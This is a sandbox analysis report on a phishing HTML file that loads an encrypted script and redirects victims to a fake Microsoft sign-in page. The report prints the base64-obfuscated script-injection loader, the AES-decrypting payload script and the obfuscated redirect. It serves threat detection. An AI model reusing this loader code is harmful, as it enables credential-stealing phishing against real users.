Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MGj3hwACvs.html

Overview

General Information

Sample name:MGj3hwACvs.html
Analysis ID:1567867
MD5:e37756f2f264e9a8b954b53716b92421
SHA1:2394db034fc5451f10a6324d5e3677d4b3eb5910
SHA256:6c643604eff267134b90b83efdf6719387a1b59240350b17ab2019b5ee0532ad
Infos:

Detection

HTMLPhisher, ReCaptcha Phish
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish54
Yara detected Recaptcha Phish
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML sample is only containing javascript code
Phishing site or detected (based on various text indicators)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\MGj3hwACvs.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1872,i,3234027420598374308,6823591640521138259,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_92JoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
    SourceRuleDescriptionAuthorStrings
    2.1.pages.csvJoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
      0.9.id.script.csvJoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
        0.10.id.script.csvJoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
          0.13.i.script.csvJoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
            0.15.i.script.csvJoeSecurity_ReCaptchaPhishYara detected Recaptcha PhishJoe Security
              Click to see the 9 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'login.protiv-bubuljica.info' does not match the legitimate domain for Microsoft., The domain 'protiv-bubuljica.info' is unrelated to Microsoft and appears suspicious., The use of a non-Microsoft domain with Microsoft branding is a common phishing tactic., The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information under the guise of Microsoft. DOM: 4.12.pages.csv
              Source: Yara matchFile source: 0.19.id.script.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 0.30.i.script.csv, type: HTML
              Source: Yara matchFile source: 4.8.pages.csv, type: HTML
              Source: Yara matchFile source: 4.9.pages.csv, type: HTML
              Source: Yara matchFile source: 4.11.pages.csv, type: HTML
              Source: Yara matchFile source: 4.12.pages.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.9.id.script.csv, type: HTML
              Source: Yara matchFile source: 0.10.id.script.csv, type: HTML
              Source: Yara matchFile source: 0.13.i.script.csv, type: HTML
              Source: Yara matchFile source: 0.15.i.script.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_92, type: DROPPED
              Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/MGj3hwACvs.html...High risk due to multiple concerning factors: 1) Uses base64 obfuscation to hide URL (3 points), 2) Dynamically injects external script into document head (3 points), 3) Suspicious domain 'kavanaltd.com' not associated with legitimate services (2 points). The presence of an email placeholder suggests potential data collection/exfiltration capabilities in the loaded script.
              Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kavanaltd.com/news/index.php...High-risk script that loads crypto-js library and performs suspicious encryption operations. It uses document.write() with decrypted content, which could inject malicious code. The use of Base64 encoding and AES encryption to obscure the actual payload is a common malware technique. The script appears to be deliberately obfuscated with random variable names.
              Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://login.protiv-bubuljica.info/HaNkgGIY#...Script shows high-risk behavior with obfuscated URL construction (splitting 'https' into individual characters) and uses window.location.assign for redirection. The incomplete URL string and obfuscation technique are common in malicious scripts attempting to bypass security filters. The use of a callback function named 'verifyCallback_CF' suggests potential manipulation of verification processes.
              Source: 0.8.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://login.protiv-bubuljica.info/HaNkgGIY#...High-risk script that exhibits multiple suspicious behaviors: 1) Uses string concatenation to obfuscate a URL (+3 points), 2) Redirects to a suspicious domain with unusual TLD (.info) and suspicious subdomain structure (+3 points), 3) Contains random-looking query parameters suggesting potential malicious intent (+2 points), 4) Domain appears designed to mimic legitimate services (+1 point). Pattern matches common phishing redirect techniques.
              Source: MGj3hwACvs.htmlHTTP Parser: Low number of body elements: 0
              Source: file:///C:/Users/user/Desktop/MGj3hwACvs.htmlHTTP Parser: New script tag found
              Source: MGj3hwACvs.htmlHTTP Parser: <script> var payd = "%EMAIL%"; document.head.append(Object.assign(document.createElement("script"), {src: atob("aHR0cHM6Ly9rYXZhbmFsdGQuY29tL25ld3MvaW5kZXgucGhw")})); </script>
              Source: Chrome DOM: 2.6OCR Text: Please stand by, while we are checking if the site cannectian is secure Verifying... CLOUDFLARE Performance & security by Microsoft
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
              Source: MGj3hwACvs.htmlHTTP Parser: Base64 decoded: https://kavanaltd.com/news/index.php
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: Found new string: script ...var verifyCallback_CF = function (response) {. console.log("verified");. window.location.assign('h' + 't' + 't' + 'ps:' + '//l' + 'og' + 'in' + '.' + 'pro' + 't' + 'iv-' + 'b' + 'ubu' + 'lji' + 'ca.' + 'in' + 'fo' + '/' + 'HaN' + 'k' + 'gGI' + 'Y' + '?n' + '=2d' + 'V0' + 'i' + 'Qc');. };.....
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
              Source: https://kavanaltd.com/news/index.phpHTTP Parser: var kckcpkburr = document.createelement("script");kckcpkburr.setattribute("src", "https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js");document.head.append(kckcpkburr);kckcpkburr.onload = function() { const sspconpbtj = cryptojs.enc.base64.parse("er3yxrnkngmeft2nbmt/w9h2ymcd0xcaaubjiva+z28c9drn6jfkp/nla2tc+x5ttrzrkzp5rwyyhg3p4aemnqksgszfgmef1rzv2ryezqwubidv5uz+suywlsglknqxfb4apfcakufc+1p9phclkvowt9eyswoxrfdnrobuvff8dzjs+qfyz28lrujo1wlr9er+jz1vhcotkdel9ba4tqtclxg4ailipvwww9u759ls5kljzbsizoi8sehaxiany3kavixr2tumlifquoq78soqidmsopmjh7jbk0fkqexo/x0ep5amzh79oncmf5uy"); const icxvvxgaez = cryptojs.lib.wordarray.create(sspconpbtj.words.slice(0, 4)); const vqgkytxnup = cryptojs.lib.wordarray.create(sspconpbtj.words.slice(4, 8)); const boqyzyiqln = cryptojs.lib.wordarray.create(sspconpbtj.words.slice(8)); const boetwpptxx = cryptojs.pbkdf2("uztvaitwbogecqgxawinkqcmxwyactkj", icxvvxgaez, { keysize: 256 / 32, iterations: 1000 }); con...
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: No favicon
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: No favicon
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: No favicon
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: No favicon
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
